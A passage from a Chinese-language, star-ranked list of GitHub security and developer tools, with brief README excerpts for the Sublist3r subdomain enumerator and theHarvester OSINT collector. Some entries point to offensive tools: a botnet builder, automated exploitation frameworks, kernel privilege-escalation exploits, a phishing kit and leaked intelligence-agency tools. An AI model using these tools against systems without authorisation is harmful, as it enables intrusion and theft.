[paddlepaddle/paddle-lite](https://github.com/PaddlePaddle/Paddle-Lite) Multi-platform high performance deep learning inference engine (『飞桨』多平台高性能深度学习预测引擎)\n- [**4945**星][11d] [Py] [worldveil/dejavu](https://github.com/worldveil/dejavu) 用Python实现的音频指纹识别算法\n- [**4940**星][10d] [JS] [wuchangming/spy-debugger](https://github.com/wuchangming/spy-debugger) 微信调试,各种WebView样式调试、手机浏览器的页面真机调试。便捷的远程调试手机页面、抓包工具,支持:HTTP/HTTPS,无需USB连接设备。\n- [**4931**星][4m] [C++] [hrydgard/ppsspp](https://github.com/hrydgard/ppsspp) 一个适用于Android、Windows、Mac和Linux的PSP模拟器,用c++编写\n- [**4928**星][10d] [Py] [jopohl/urh](https://github.com/jopohl/urh) 通用无线电黑客:像boss一样研究无线协议\n- [**4906**星][8d] [Ruby] [wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) 免费的,非商业用途,黑盒WordPress漏洞扫描器写的安全专业人士和博客维护者,以测试他们的WordPress网站的安全性。\n- [**4906**星][10d] [C++] [mozilla/rr](https://github.com/mozilla/rr) 记录与重放App的调试执行过程\n- [**4893**星][10d] [C] [openvpn/openvpn](https://github.com/openvpn/openvpn) 开源VPN守护进程\n- [**4891**星][3m] [Py] [openmined/pysyft](https://github.com/openmined/pysyft) 一个用于加密的、保护隐私的机器学习的库\n- [**4890**星][11d] [Go] [ponzu-cms/ponzu](https://github.com/ponzu-cms/ponzu) Headless CMS with automatic JSON API. Featuring auto-HTTPS from Let's Encrypt, HTTP/2 Server Push, and flexible server framework written in Go.\n- [**4868**星][1y] [Py] [10se1ucgo/disablewintracking](https://github.com/10se1ucgo/disablewintracking) 使用一些已知的方法,试图在Windows 10中最小化跟踪\n- [**4850**星][10d] [qazbnm456/awesome-web-security](https://github.com/qazbnm456/awesome-web-security) web 安全资源列表\n- [**4817**星][10d] [Py] [jofpin/trape](https://github.com/jofpin/trape) 学习在互联网上跟踪别人,获取其详细信息,并避免被别人跟踪\n- [**4806**星][10d] [Shell] [zardus/ctf-tools](https://github.com/zardus/ctf-tools) Some setup scripts for security research tools.\n- [**4793**星][7d] [Swift] [signalapp/signal-ios](https://github.com/signalapp/Signal-iOS) A private messenger for iOS.\n- [**4781**星][7d] [Ruby] [vcr/vcr](https://github.com/vcr/vcr) 记录您的测试套件的HTTP交互,并在未来的测试运行期间重播它们,以便进行快速、确定、准确的测试。\n- [**4760**星][10d] [Java] [spring-projects/spring-security](https://github.com/spring-projects/spring-security) Spring Security\n- [**4753**星][10d] [Shell] [dehydrated-io/dehydrated](https://github.com/dehydrated-io/dehydrated) 以shell脚本实现的letsencrypt/acme客户端\n- [**4748**星][4m] [PHP] [phan/phan](https://github.com/phan/phan) Phan is a static analyzer for PHP. Phan prefers to avoid false-positives and attempts to prove incorrectness rather than correctness.\n- [**4730**星][5m] [powershell/win32-openssh](https://github.com/powershell/win32-openssh) Win32版本的OpenSSH\n- [**4722**星][6m] [C] [google/ios-webkit-debug-proxy](https://github.com/google/ios-webkit-debug-proxy) 一个用于iOS设备的DevTools代理(Chrome远程调试协议)(Safari远程Web Inspector)。\n- [**4716**星][10d] [Py] [dxa4481/trufflehog](https://github.com/dxa4481/trufflehog) 在git存储库中搜索高熵字符串和秘密,深入挖掘提交历史\n- [**4711**星][10d] [Py] [secureauthcorp/impacket](https://github.com/SecureAuthCorp/impacket) Python类收集, 用于与网络协议交互\n- [**4701**星][10d] [Rust] [timvisee/ffsend](https://github.com/timvisee/ffsend) 轻松、安全地从命令行共享文件\n- [**4687**星][11d] [Go] [davecheney/httpstat](https://github.com/davecheney/httpstat) It's like curl -v, with colours.\n- [**4669**星][4m] [Shell] [dehydrated-io/dehydrated](https://github.com/dehydrated-io/dehydrated) letsencrypt/acme client implemented as a shell-script – just add water\n- [**4660**星][11d] [JS] [bfirsh/jsnes](https://github.com/bfirsh/jsnes) 一个JavaScript NES模拟器。\n- [**4659**星][10d] [Jupyter Notebook] [aimacode/aima-python](https://github.com/aimacode/aima-python) ython实现的算法来自Russell和Norvig的“人工智能——一种现代方法”\n- [**4655**星][11d] [C] [jedisct1/dsvpn](https://github.com/jedisct1/dsvpn) 一个非常简单的VPN。\n- [**4653**星][1y] [Py] [ecthros/uncaptcha2](https://github.com/ecthros/uncaptcha2) 以91%的准确率击败最新版本的ReCaptcha\n- [**4607**星][4m] [JS] [cure53/dompurify](https://github.com/cure53/dompurify) 一个仅用于dom、超高速、超强容纳性的XSS杀毒器,适用于HTML、MathML和SVG\n- [**4598**星][10d] [Shell] [ashishb/android-security-awesome](https://github.com/ashishb/android-security-awesome) A collection of android security related resources\n- [**4590**星][10d] [Go] [gophish/gophish](https://github.com/gophish/gophish) 网络钓鱼工具包\n- [**4588**星][11d] [Go] [wallix/awless](https://github.com/wallix/awless) 对于AWS来说,这是一个强大的CLI\n- [**4544**星][11d] [jivoi/awesome-osint](https://github.com/jivoi/awesome-osint) OSINT资源收集\n- [**4535**星][2y] [Py] [lining0806/pythonspidernotes](https://github.com/lining0806/pythonspidernotes) Python入门网络爬虫之精华版\n- [**4534**星][11d] [Py] [tensorflow/cleverhans](https://github.com/tensorflow/cleverhans) Python库,基准测试(benchmark)机器学习系统的漏洞生成(to)对抗样本(adversarial examples)\n- [**4527**星][7d] [Py] [chyroc/wechatsogou](https://github.com/chyroc/wechatsogou) 基于搜狗微信搜索的微信公众号爬虫接口\n- [**4524**星][10d] [Go] [shopify/toxiproxy](https://github.com/shopify/toxiproxy) 用于模拟网络条件的框架,用测试来证明您的应用程序没有单点故障吗\n- [**4519**星][10d] [JS] [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) A curated list of CTF frameworks, libraries, resources and softwares\n- [**4519**星][10d] [JS] [apsdehal/awesome-ctf](https://github.com/apsdehal/awesome-ctf) A curated list of CTF frameworks, libraries, resources and softwares\n- [**4517**星][11d] [Go] [michenriksen/gitrob](https://github.com/michenriksen/gitrob) 查找push到公开的Github repo中的敏感信息\n- [**4489**星][10d] [Go] [dexidp/dex](https://github.com/dexidp/dex) 带有可插入连接器的OpenID连接标识(OIDC)和OAuth 2.0提供程序\n- [**4454**星][11d] [Java] [mcxiaoke/packer-ng-plugin](https://github.com/mcxiaoke/packer-ng-plugin) 下一代Android打包工具,100个渠道包只需要10秒钟\n- [**4444**星][10d] [Py] [smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) 自动收集指定目标的信息:IP、域名、主机名、网络子网、ASN、邮件地址、用户名\n- [**4442**星][10d] [PHP] [fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) 通过动态App安全测试来查找App安全漏洞, 算是不带扫描器的漏洞扫描器\n- [**4436**星][2y] [JS] [yujiosaka/headless-chrome-crawler](https://github.com/yujiosaka/headless-chrome-crawler) 分布式爬虫,Headless Chrome\n- [**4398**星][3m] [C#] [xupefei/locale-emulator](https://github.com/xupefei/locale-emulator) 另一个系统重新登陆和语言模拟器\n- [**4395**星][10d] [Py] [spiderclub/haipproxy](https://github.com/spiderclub/haipproxy) \n- [**4393**星][11d] [TS] [javascript-obfuscator/javascript-obfuscator](https://github.com/javascript-obfuscator/javascript-obfuscator) 一个强大的JavaScript和Node.js模糊器\n- [**4377**星][10d] [JS] [travist/jsencrypt](https://github.com/travist/jsencrypt) 用于执行OpenSSL RSA加密、解密和密钥生成的Javascript库\n- [**4376**星][10d] [C++] [anbox/anbox](https://github.com/anbox/anbox) 在常规GNU / Linux系统上引导完整的Android系统,基于容器\n- [**4372**星][10d] [LLVM] [llvm-mirror/llvm](https://github.com/llvm-mirror/llvm) Project moved to:\n- [**4370**星][1y] [Py] [lennylxx/ipv6-hosts](https://github.com/lennylxx/ipv6-hosts) hosts文件,用于提高IPv6访问速度的谷歌,YouTube, Facebook,维基百科等在中国大陆。\n- [**4361**星][5m] [Py] [aboul3la/sublist3r](https://github.com/aboul3la/sublist3r) 快速子域名枚举\n
\n 查看详情\n\n\n ## 存在问题\n - 代理集成\n - 翻墙\n - 结果的保存与查看, 是不是该有啥可视化工具???\n \n ## 使用OSINT的方式搜索子域名\n - 使用多个搜索引擎: Google, Yahoo, Bing, Baidu, Ask\n - 使用: Netcraft, Virustotal, ThreatCrowd, DNSdumpster, ReverseDNS.\n - 集成: subbrute(爆破)\n \n ## 安装\n - `git clone https://github.com/aboul3la/Sublist3r.git`\n - `sudo pip install -r requirements.txt`\n \n ## 使用\n Short Form | Long Form | Description\n ------------- | ------------- |-------------\n -d | --domain | Domain name to enumerate subdomains of\n -b | --bruteforce | Enable the subbrute bruteforce module\n -p | --ports | Scan the found subdomains against specific tcp ports\n -v | --verbose | Enable the verbose mode and display results in realtime\n -t | --threads | Number of threads to use for subbrute bruteforce\n -e | --engines | Specify a comma-separated list of search engines\n -o | --output | Save the results to text file\n -h | --help | show the help message and exit\n \n ## 作为模块使用\n ```python\n import sublist3r \n subdomains = sublist3r.main(domain, no_threads, savefile, ports, silent, verbose, enable_bruteforce, engines)\n ```\n
\n\n\n- [**4358**星][10d] [Java] [jesusfreke/smali](https://github.com/jesusfreke/smali) dalvik使用的dex格式的汇编器/反汇编器\n- [**4355**星][2m] [Py] [diafygi/acme-tiny](https://github.com/diafygi/acme-tiny) 一个用于从Let's Encrypt中发出和更新TLS证书的小脚本\n- [**4355**星][10d] [Assembly] [cjdelisle/cjdns](https://github.com/cjdelisle/cjdns) 使用公钥加密技术进行地址分配的加密IPv6网络和用于路由的分布式哈希表。\n- [**4353**星][10d] [wtsxdev/reverse-engineering](https://github.com/wtsxdev/reverse-engineering) List of awesome reverse engineering resources\n- [**4350**星][3m] [C] [nonstriater/learn-algorithms](https://github.com/nonstriater/learn-algorithms) 算法学习笔记\n- [**4349**星][2y] [Py] [rmax/scrapy-redis](https://github.com/rmax/scrapy-redis) 用于Scrapy的基于redis的组件。\n- [**4340**星][1y] [ObjC] [alonemonkey/monkeydev](https://github.com/alonemonkey/monkeydev) CaptainHook微调,徽标微调和命令行工具,补丁iOS应用程序,没有越狱\n- [**4339**星][11d] [imeiji/shadowsocks_install](https://github.com/imeiji/shadowsocks_install) 自动安装shadowsocks服务器\n- [**4330**星][10d] [Pascal] [cheat-engine/cheat-engine](https://github.com/cheat-engine/cheat-engine) Cheat Engine. A development environment focused on modding\n- [**4327**星][10d] [JS] [butterproject/butter-desktop](https://github.com/butterproject/butter-desktop) All the free parts of Popcorn Time\n- [**4326**星][7d] [Py] [spiderclub/weibospider](https://github.com/spiderclub/weibospider) \n- [**4326**星][7d] [Py] [spiderclub/weibospider](https://github.com/SpiderClub/weibospider) 微博爬虫\n- [**4309**星][4m] [we5ter/scanners-box](https://github.com/we5ter/scanners-box) 安全行业从业者自研开源扫描器合辑\n- [**4297**星][10d] [Py] [hypothesisworks/hypothesis](https://github.com/HypothesisWorks/hypothesis) Hypothesis is a powerful, flexible, and easy to use library for property-based testing.\n- [**4297**星][10d] [Py] [hypothesisworks/hypothesis](https://github.com/HypothesisWorks/hypothesis) Hypothesis is a powerful, flexible, and easy to use library for property-based testing.\n- [**4261**星][10d] [Go] [mozilla/sops](https://github.com/mozilla/sops) 简单灵活的秘密管理工具\n- [**4257**星][11d] [JS] [cuckoosandbox/cuckoo](https://github.com/cuckoosandbox/cuckoo) Cuckoo Sandbox is an automated dynamic malware analysis system\n- [**4257**星][11d] [JS] [cuckoosandbox/cuckoo](https://github.com/cuckoosandbox/cuckoo) 一个自动动态恶意软件分析系统\n- [**4255**星][10d] [C] [tencent/tencentos-tiny](https://github.com/tencent/tencentos-tiny) 腾讯物联网终端操作系统\n- [**4252**星][4m] [Shell] [angristan/openvpn-install](https://github.com/angristan/openvpn-install) 在Debian、Ubuntu、Fedora、CentOS或Arch Linux上设置自己的OpenVPN服务器。\n- [**4243**星][7d] [PS] [bloodhoundad/bloodhound](https://github.com/BloodHoundAD/BloodHound) 一个单页Javascript web应用程序,使用图论来揭示Active Directory环境中隐藏的且常常是意外的关系\n- [**4235**星][10d] [JS] [lesspass/lesspass](https://github.com/lesspass/lesspass) 无状态密码管理器。\n- [**4234**星][10d] [Py] [euske/pdfminer](https://github.com/euske/pdfminer) Python PDF解析器\n- [**4232**星][7m] [JS] [sigalor/whatsapp-web-reveng](https://github.com/sigalor/whatsapp-web-reveng) WhatsApp Web API逆向与重新实现\n- [**4226**星][11d] [forter/security-101-for-saas-startups](https://github.com/forter/security-101-for-saas-startups) 初学者安全小窍门\n- [**4214**星][11d] [JS] [kdzwinel/betwixt](https://github.com/kdzwinel/betwixt) 在浏览器外,使用熟悉的Chrome DevTools界面分析网络流量\n- [**4211**星][10d] [Py] [angr/angr](https://github.com/angr/angr) 一个强大的用户友好的二进制分析平台\n- [**4208**星][4m] [drduh/yubikey-guide](https://github.com/drduh/yubikey-guide) 在GPG和SSH中使用YubiKey的指南\n- [**4207**星][10d] [Py] [google/clusterfuzz](https://github.com/google/clusterfuzz) 可扩展的Fuzzing基础架构\n- [**4197**星][10d] [C] [aol/moloch](https://github.com/aol/moloch) 数据包捕获、索引工具,支持数据库\n- [**4194**星][7d] [C] [secwiki/windows-kernel-exploits](https://github.com/secwiki/windows-kernel-exploits) windows-kernel-exploits Windows平台提权漏洞集合\n- [**4186**星][7d] [PHP] [ethicalhack3r/dvwa](https://github.com/ethicalhack3r/DVWA) Damn Vulnerable Web Application (DVWA)\n- [**4166**星][10d] [Py] [xoreaxeaxeax/sandsifter](https://github.com/xoreaxeaxeax/sandsifter) x86 处理器 Fuzzer,查找 Intel 的隐藏指令和 CPU bug\n- [**4166**星][10d] [Py] [paralax/awesome-honeypots](https://github.com/paralax/awesome-honeypots) an awesome list of honeypot resources\n- [**4139**星][10d] [hakluke/how-to-exit-vim](https://github.com/hakluke/how-to-exit-vim) Below are some simple methods for exiting vim.\n- [**4136**星][3m] [C#] [microsoft/msbuild](https://github.com/microsoft/msbuild) The Microsoft Build Engine (MSBuild) is the build platform for .NET and Visual Studio.\n- [**4135**星][2m] [C] [aquynh/capstone](https://github.com/aquynh/capstone) 汇编/反汇编框架\n- [**4127**星][10d] [Go] [montferret/ferret](https://github.com/montferret/ferret) Declarative web scraping\n- [**4119**星][10d] [PHP] [paragonie/awesome-appsec](https://github.com/paragonie/awesome-appsec) A curated list of resources for learning about application security\n- [**4114**星][10d] [C#] [0xd4d/de4dot](https://github.com/0xd4d/de4dot) .NET 反混淆和脱壳\n- [**4107**星][10d] [Rust] [svenstaro/genact](https://github.com/svenstaro/genact) a nonsense activity generator\n- [**4100**星][10d] [Shell] [drwetter/testssl.sh](https://github.com/drwetter/testssl.sh) 检查服务器任意端口对 TLS/SSL 的支持、协议以及一些加密缺陷,命令行工具\n- [**4100**星][12d] [brucedone/awesome-crawler](https://github.com/brucedone/awesome-crawler) A collection of awesome web crawler,spider in different languages\n- [**4087**星][10d] [Py] [reorx/httpstat](https://github.com/reorx/httpstat) curl statistics made simple\n- [**4071**星][7m] [Swift] [lexrus/vpnon](https://github.com/lexrus/vpnon) 像英雄一样打开VPN。\n- [**4054**星][10d] [Py] [longld/peda](https://github.com/longld/peda) GDB漏洞开发助手,Python编写\n- [**4046**星][3y] [C#] [shadowsocksr-backup/shadowsocksr-csharp](https://github.com/shadowsocksr-backup/shadowsocksr-csharp) shadowsocksr C#\n- [**4040**星][7d] [C#] [winsw/winsw](https://github.com/winsw/winsw) 一种可执行文件的包装器,可用于以Windows服务的形式托管任何可执行文件\n- [**4035**星][4m] [C++] [baldurk/renderdoc](https://github.com/baldurk/renderdoc) 基于帧捕获的图形调试器,当前可用于Vulkan,D3D11,D3D12,OpenGL和OpenGL ES开发\n- [**4025**星][9m] [Py] [nullarray/autosploit](https://github.com/nullarray/autosploit) 自动化漏洞利用\n- [**4025**星][3m] [Go] [eranyanay/1m-go-websockets](https://github.com/eranyanay/1m-go-websockets) handling 1M websockets connections in Go\n- [**4019**星][7d] [C] [wind4/vlmcsd](https://github.com/wind4/vlmcsd) C语言的KMS模拟器(目前在Linux上运行,包括Android、FreeBSD、Solaris、Minix、Mac OS、iOS、Windows有或没有Cygwin)\n- [**4002**星][10d] [C] [nmap/nmap](https://github.com/nmap/nmap) Nmap\n- [**3994**星][10d] [Py] [malwaredllc/byob](https://github.com/malwaredllc/byob) BYOB (Build Your Own Botnet)\n- [**3977**星][3m] [acl4ssr/acl4ssr](https://github.com/acl4ssr/acl4ssr) SSR 去广告ACL规则/SS完整GFWList规则/Clash规则碎片,Telegram频道订阅地址\n- [**3974**星][3m] [C++] [xenia-project/xenia](https://github.com/xenia-project/xenia) Xbox 360仿真器研究项目\n- [**3970**星][5y] [shadowsocksr-backup/shadowsocks-rss](https://github.com/shadowsocksr-backup/shadowsocks-rss) ShadowsocksR update rss, SSR organization\n- [**3954**星][6m] [jjqqkk/chromium](https://github.com/jjqqkk/chromium) Chromium browser with SSL VPN. Use this browser to unblock websites.\n- [**3953**星][10d] [Java] [ffay/lanproxy](https://github.com/ffay/lanproxy) 将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面...)\n- [**3953**星][4m] [C] [atmosphere-nx/atmosphere](https://github.com/atmosphere-nx/atmosphere) 一个工作在进行中的任天堂交换机定制固件。\n- [**3948**星][10d] [JS] [shadowsocks/shadowsocks-manager](https://github.com/shadowsocks/shadowsocks-manager) A shadowsocks manager tool for multi user and traffic control.\n- [**3938**星][10d] [D] [gnunn1/tilix](https://github.com/gnunn1/tilix) 一个使用GTK+ 3的Linux平铺终端仿真器\n- [**3935**星][10d] [Go] [jpillora/chisel](https://github.com/jpillora/chisel) 基于HTTP的快速 TCP 隧道\n- [**3931**星][3m] [blacckhathaceekr/pentesting-bible](https://github.com/blacckhathaceekr/pentesting-bible) links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources.\n- [**3927**星][4m] [Shell] [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.\n- [**3909**星][10d] [Go] [adguardteam/adguardhome](https://github.com/adguardteam/adguardhome) Network-wide ads & trackers blocking DNS server\n- [**3901**星][10d] [PS] [samratashok/nishang](https://github.com/samratashok/nishang) 渗透框架,脚本和Payload收集,主要是PowerShell,涵盖渗透的各个阶段\n- [**3893**星][7d] [C] [cyan4973/xxhash](https://github.com/cyan4973/xxhash) 非常快的非加密哈希算法\n- [**3884**星][10d] [Py] [micahflee/onionshare](https://github.com/micahflee/onionshare) 安全和匿名发送和接收文件,并发布洋葱网站\n- [**3878**星][10d] [C] [facebook/fishhook](https://github.com/facebook/fishhook) 支持在iOS上运行的Mach-O二进制文件中动态重新绑定符号的库\n- [**3871**星][4m] [ObjC] [sveinbjornt/sloth](https://github.com/sveinbjornt/sloth) Mac应用程序,显示所有正在运行的进程使用的所有打开的文件、目录和套接字。很好的lsof GUI。\n- [**3860**星][5y] [iosre/iosappreverseengineering](https://github.com/iosre/iosappreverseengineering) The world’s 1st book of very detailed iOS App reverse engineering skills :)\n- [**3846**星][2m] [Go] [hashicorp/consul-template](https://github.com/hashicorp/consul-template) Template rendering, notifier, and supervisor for\n- [**3832**星][3m] [Go] [go-acme/lego](https://github.com/go-acme/lego) 用Go编写 Let's Encrypt客户机和ACME库\n- [**3831**星][3m] [C++] [pcsx2/pcsx2](https://github.com/pcsx2/pcsx2) PCSX2 - The Playstation 2 Emulator\n- [**3820**星][10d] [Py] [maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) Web path scanner\n- [**3816**星][10d] [Perl] [sullo/nikto](https://github.com/sullo/nikto) Nikto web服务器扫描器\n- [**3816**星][10d] [C] [meetecho/janus-gateway](https://github.com/meetecho/janus-gateway) Janus WebRTC服务器\n- [**3812**星][10d] [C] [mikebrady/shairport-sync](https://github.com/mikebrady/shairport-sync) AirPlay audio player. Shairport Sync adds multi-room capability with Audio Synchronisation\n- [**3807**星][11d] [JS] [samyk/evercookie](https://github.com/samyk/evercookie) JavaScript API,在浏览器中创建超级顽固的cookie,在标准Cookie、Flask Cookie等被清除之后依然能够识别客户端\n- [**3801**星][7m] [Go] [microsoft/ethr](https://github.com/microsoft/ethr) 一个用于TCP、UDP和HTTP的网络性能测量工具。\n- [**3800**星][3m] [C] [freerdp/freerdp](https://github.com/freerdp/freerdp) 一个免费的远程桌面协议库和客户端\n- [**3794**星][10d] [C] [iaik/meltdown](https://github.com/iaik/meltdown) 几个应用程序,演示了Meltdown错误。\n- [**3769**星][10d] [Py] [misterch0c/shadowbroker](https://github.com/misterch0c/shadowbroker) 方程式最新泄露\n- [**3754**星][10d] [shadowsocksrr/shadowsocks-rss](https://github.com/shadowsocksrr/shadowsocks-rss) ShadowsocksR update rss, SSR organization\n- [**3742**星][10d] [Py] [laramies/theharvester](https://github.com/laramies/theharvester) 使用多个公共数据收集电子邮件,名称,子域,IP和URL\n
\n 查看详情\n\n\n ## 被动源:\n - baidu: Baidu search engine - www.baidu.com\n - bing: Microsoft search engine - www.bing.com\n - bingapi: Microsoft search engine, through the API (Requires an API key, see below.)\n - CertSpotter: Cert Spotter monitors Certificate Transparency logs - https://sslmate.com/certspotter/\n - crtsh: Comodo Certificate search - www.crt.sh\n - dnsdumpster: DNSdumpster search engine - dnsdumpster.com\n - dogpile: Dogpile search engine - www.dogpile.com\n - duckduckgo: DuckDuckGo search engine - www.duckduckgo.com\n - Exalead: a Meta search engine - https://www.exalead.com/search\n - github-code: Github code search engine (Requires a Github Personal Access Token, see below.) - www.github.com\n - google: Google search engine (Optional Google dorking.) - www.google.com\n - hunter: Hunter search engine (Requires an API key, see below.) - www.hunter.io\n - intelx: Intelx search engine (Requires an API key, see below.) - www.intelx.io\n - linkedin: Google search engine, specific search for LinkedIn users - www.linkedin.com\n - netcraft: Internet Security and Data Mining - www.netcraft.com\n - otx: AlienVault Open Threat Exchange - https://otx.alienvault.com\n - securityTrails: Security Trails search engine, the world's largest repository of historical DNS data (Requires an API key, see below.) - www.securitytrails.com\n - shodan: Shodan search engine, will search for ports and banners from discovered hosts - www.shodanhq.com\n - Spyse: Web research tools for professionals (Requires an API key.) - https://spyse.com/\n - Suip: Web research tools that can take over 10 minutes to run, but worth the wait. - https://suip.biz/\n - threatcrowd: Open source threat intelligence - www.threatcrowd.org\n - trello: Search trello boards (Uses Google search.)\n - twitter: Twitter accounts related to a specific domain (Uses Google search.)\n - vhost: Bing virtual hosts search\n - virustotal: virustotal.com domain search\n - yahoo: Yahoo search engine\n \n ## 主动源:\n - DNS爆破: 字典\n \n ## 需要API-key的\n - bing\n - github\n - hunter\n - intelx\n - securityTrails\n - shodan\n - spyse\n
\n\n\n- [**3724**星][10d] [Go] [elazarl/goproxy](https://github.com/elazarl/goproxy) Go编写的HTTP代理库\n- [**3709**星][10d] [Py] [jrohy/multi-v2ray](https://github.com/jrohy/multi-v2ray) v2ray多用户管理部署程序\n- [**3708**星][8d] [PHP] [hanc00l/wooyun_public](https://github.com/hanc00l/wooyun_public) 乌云公开漏洞、知识库爬虫和搜索\n- [**3707**星][10d] [HTML] [consensys/smart-contract-best-practices](https://github.com/consensys/smart-contract-best-practices) A guide to smart contract security best practices\n- [**3693**星][12d] [jivoi/awesome-ml-for-cybersecurity](https://github.com/jivoi/awesome-ml-for-cybersecurity) 针对网络安全的机器学习资源列表\n- [**3690**星][10d] [HTML] [hamukazu/lets-get-arrested](https://github.com/hamukazu/lets-get-arrested) 对抗日本警察\n- [**3689**星][10d] [C] [shellphish/how2heap](https://github.com/shellphish/how2heap) 学习各种堆利用技巧的repo\n- [**3682**星][10d] [C] [awslabs/s2n](https://github.com/awslabs/s2n) TLS/SSL协议的实现\n- [**3680**星][11d] [C++] [mandliya/algorithms_and_data_structures](https://github.com/mandliya/algorithms_and_data_structures) 180+ Algorithm & Data Structure Problems using C++\n- [**3680**星][2y] [Py] [qiyeboy/ipproxypool](https://github.com/qiyeboy/ipproxypool) IPProxyPool代理池项目,提供代理ip\n- [**3672**星][8d] [Go] [tophubs/toplist](https://github.com/tophubs/toplist) 今日热榜,一个获取各大热门网站热门头条的聚合网站,使用Go语言编写,多协程异步快速抓取信息,预览:\n- [**3667**星][4m] [JS] [koenkk/zigbee2mqtt](https://github.com/koenkk/zigbee2mqtt) Zigbee\n- [**3664**星][3m] [Smarty] [anankke/sspanel-uim](https://github.com/anankke/sspanel-uim) 专为 Shadowsocks / ShadowsocksR / V2Ray 设计的多用户管理面板\n- [**3659**星][3m] [C] [screetsec/thefatrat](https://github.com/screetsec/thefatrat) 大规模漏洞利用工具\n- [**3653**星][11d] [Shell] [toyodadoubi/doubi](https://github.com/toyodadoubi/doubi) 一个逗比写的各种逗比脚本~\n- [**3645**星][6y] [C#] [brandonlw/psychson](https://github.com/brandonlw/Psychson) Phison 2251-03(2303)定制固件和现有固件补丁(BadUSB)\n- [**3643**星][3y] [C] [hak5darren/usb-rubber-ducky](https://github.com/hak5darren/usb-rubber-ducky) 使用简单的脚本语言可编程的人机界面设备,允许渗透测试人员快速、轻松地设计和部署模拟人类键盘输入的安全审计负载。\n- [**3627**星][10d] [C#] [mathewsachin/captura](https://github.com/mathewsachin/captura) Capture Screen, Audio, Cursor, Mouse Clicks and Keystrokes\n- [**3627**星][8d] [C] [virustotal/yara](https://github.com/virustotal/yara) 模式匹配瑞士军刀\n- [**3618**星][10d] [teivah/algodeck](https://github.com/teivah/algodeck) An Open-Source Collection of +200 Algorithmic Flash Cards to Help you Preparing your Algorithm & Data Structure Interview\n- [**3614**星][10d] [Py] [rarcega/instagram-scraper](https://github.com/rarcega/instagram-scraper) Scrapes an instagram user's photos and videos\n- [**3609**星][3y] [Perl] [x0rz/eqgrp](https://github.com/x0rz/eqgrp) Decrypted content of eqgrp-auction-file.tar.xz\n- [**3597**星][2y] [C#] [nummer/destroy-windows-10-spying](https://github.com/nummer/destroy-windows-10-spying) 摧毁Windows间谍工具\n- [**3592**星][1y] [C] [rpisec/mbe](https://github.com/rpisec/mbe) Course materials for Modern Binary Exploitation by RPISEC\n- [**3589**星][11d] [Go] [fanpei91/torsniff](https://github.com/fanpei91/torsniff) 从BitTorrent网络嗅探种子\n- [**3589**星][11d] [Go] [fanpei91/torsniff](https://github.com/fanpei91/torsniff) 从BitTorrent网络嗅探种子\n- [**3584**星][11d] [Py] [stamparm/maltrail](https://github.com/stamparm/maltrail) 恶意网络流量检测系统\n- [**3582**星][10d] [C] [betaflight/betaflight](https://github.com/betaflight/betaflight) 开源飞行控制器固件\n- [**3579**星][7d] [C#] [win-acme/win-acme](https://github.com/win-acme/win-acme) 一个用于Windows的简单ACME客户端(用于Let's Encrypt等)。\n- [**3579**星][10d] [HTML] [goproxy/goproxy.cn](https://github.com/goproxy/goproxy.cn) 中国最受信任的Go模块代理\n- [**3576**星][10d] [C] [qemu/qemu](https://github.com/qemu/qemu) 官方QEMU镜像\n- [**3554**星][10d] [C] [tmate-io/tmate](https://github.com/tmate-io/tmate) 即时终端共享\n- [**3551**星][10d] [hslatman/awesome-threat-intelligence](https://github.com/hslatman/awesome-threat-intelligence) A curated list of Awesome Threat Intelligence resources\n- [**3550**星][10d] [HTML] [grangier/python-goose](https://github.com/grangier/python-goose) Html内容/文章提取器,Python的web爬取库\n- [**3549**星][4m] [Java] [jasonchenlijian/fastble](https://github.com/jasonchenlijian/fastble) Android蓝牙低功耗(BLE)快速开发框架。\n- [**3538**星][6y] [R] [johnmyleswhite/ml_for_hackers](https://github.com/johnmyleswhite/ml_for_hackers) 《Machine Learning for Hackers》随书代码\n- [**3538**星][10m] [Shell] [chengr28/revokechinacerts](https://github.com/chengr28/revokechinacerts) 全自动可疑证书吊销工具\n- [**3532**星][10d] [sundowndev/hacker-roadmap](https://github.com/sundowndev/hacker-roadmap) an overview of what you need to learn penetration testing and a collection of hacking tools, resources and references to practice ethical hacking\n- [**3523**星][10d] [CSS] [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) 由多家咨询公司和学术安全组织发布的公共渗透测试报告的精选清单\n- [**3510**星][10d] [JS] [digitalbazaar/forge](https://github.com/digitalbazaar/forge) TLS在Javascript中的原生实现和工具,用于编写基于加密和大量网络的web应用程序\n- [**3509**星][4m] [Java] [meituan-dianping/robust](https://github.com/meituan-dianping/robust) 一个具有高兼容性和高稳定性的Android热修复解决方案\n- [**3503**星][11m] [C] [session-replay-tools/tcpcopy](https://github.com/session-replay-tools/tcpcopy) TCP 流量回放工具,可用于性能测试、稳定性测试、压力测试、加载测试、smoke 测试等\n- [**3494**星][12d] [JS] [ionicabizau/scrape-it](https://github.com/ionicabizau/scrape-it) A Node.js scraper for humans.\n- [**3486**星][11d] [JS] [duo-labs/cloudmapper](https://github.com/duo-labs/cloudmapper) 生成AWS环境的网络拓扑图\n- [**3477**星][11d] [HTML] [leizongmin/js-xss](https://github.com/leizongmin/js-xss) 使用白名单指定的配置对不受信任的HTML(以防止XSS)进行无害化处理\n- [**3477**星][10d] [Shell] [gfw-breaker/ssr-accounts](https://github.com/gfw-breaker/ssr-accounts) 一键部署Shadowsocks服务;免费Shadowsocks账号分享;免费SS账号分享; 翻墙;无界,自由门,SquirrelVPN\n- [**3476**星][11d] [Py] [google/grr](https://github.com/google/grr) 事件响应的远程实时取证\n- [**3475**星][10m] [C++] [wangyu-/udp2raw-tunnel](https://github.com/wangyu-/udp2raw-tunnel) udp 打洞。通过raw socket给UDP包加上TCP或ICMP header,进而绕过UDP屏蔽或QoS,或在UDP不稳定的环境下提升稳定性\n- [**3468**星][2m] [JS] [mcollina/autocannon](https://github.com/mcollina/autocannon) 